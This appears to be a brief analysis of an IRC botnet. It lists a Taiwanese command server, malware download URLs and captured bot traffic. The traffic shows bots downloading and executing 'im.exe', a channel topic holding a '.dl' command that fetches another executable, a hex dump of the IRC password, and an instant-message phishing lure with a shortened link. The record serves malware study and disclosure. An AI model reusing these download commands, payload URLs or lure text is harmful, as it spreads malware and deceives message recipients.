163.20.108.31 (botnet hosted in Taiwan Taipei Tanet Taipei Nccu Regional Network)

Remote Host | Port Number
163.20.108.31 | 1863
208.75.230.43 | 80

* The data identified by the following URLs was then requested from the remote web server:
  o http://www.freewebtown.com/newlow/im.exe
  o http://www.freewebtown.com/newlow/photo.exe

JOIN #newbin# abc
PONG 422
PRIVMSG #newbin# :[Download]: Downloading File From: http://www.freewebtown.com/newlow/im.exe, To: C:\Documents and Settings\UserName\Application Data\qghumeaylnlfdxfircvs85.exe
PRIVMSG #newbin# :[Download]: File Successfully Downloaded To: C:\Documents and Settings\UserName\Application Data\qghumeaylnlfdxfircvs85.exe
PRIVMSG #newbin# :[Download]: Successfully Executed: C:\Documents and Settings\UserName\Application Data\qghumeaylnlfdxfircvs85.exe
NICK n[USA|XP]007681
USER 0076 "" "TsGh" :0076
JOIN #im# abc
NICK [USA|XP]021824
USER 0218 "" "TsGh" :0218

00000000 | 5041 5353 205C 676F 6F67 6C65 5F63 6163 | PASS \google_cac
00000010 | 6865 322E 746D 700D 0A50 4153 5320 5C67 | he2.tmp..PASS \g
00000020 | 6F6F 676C 655F 6361 6368 6532 2E74 6D70 | oogle_cache2.tmp
00000030 | 0D0A | ..

Now talking in #im#
Topic On: [ #im# ] [ .dl http://www.freewebtown.com/newlow/photo.exe ]
Topic By: [ rm ]

.im hey, is this really you? http://tiny.cc/facebook-photo-18-02-2011

Hosting information:
http://whois.domaintools.com/163.20.108.31
